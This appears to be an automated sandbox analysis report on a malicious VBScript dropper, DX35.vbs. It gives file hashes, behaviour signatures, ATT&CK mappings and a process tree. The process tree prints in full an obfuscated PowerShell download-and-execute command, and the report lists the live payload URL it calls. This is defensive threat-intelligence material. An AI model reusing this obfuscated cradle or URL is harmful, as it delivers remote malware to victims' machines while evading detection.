Overview

overview

10

Static

static

DX35.vbs

windows7_x64

10

DX35.vbs

windows10_x64

10

Analysis

  • max time kernel
    7s
  • max time network
    11s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    02-05-2021 05:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    DX35.vbs

  • Size

    978B

  • MD5

    bcbad24347e93a0508784f3b4301b7eb

  • SHA1

    e53eebe440a13db0d356aba83a7e7163dcb5b09f

  • SHA256

    a75682a8be7a7470d0afbcb52b78fd4062fd4a719179730fe3ae6ce836a67a61

  • SHA512

    3bfd946bcd9a06d15bb69a938865763d35dde92992d4cfb9b5065e5397803bf486eb57f2bdd83d59badea7afbddc45ce0920f139fe11107688e2bb781ce4a98b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://nyc002.hawkhost.com/~mazenne1/ITR/ls.txt

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DX35.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:788
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I`E`X((n`e`W`-Obj`E`c`T(('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).INVOKE((('https://nyc002.hawkhost.com/~mazenne1/ITR/ls.txt'))))
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1504

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/788-60-0x000007FEFBC81000-0x000007FEFBC83000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1504-61-0x0000000000000000-mapping.dmp
    Download
  • memory/1504-63-0x0000000002300000-0x0000000002301000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1504-64-0x000000001ACE0000-0x000000001ACE1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1504-65-0x0000000002340000-0x0000000002341000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1504-66-0x000000001AC60000-0x000000001AC62000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1504-67-0x000000001AC64000-0x000000001AC66000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1504-68-0x0000000001EB0000-0x0000000001EB1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1504-69-0x000000001C400000-0x000000001C401000-memory.dmp
    Filesize

    4KB

    Download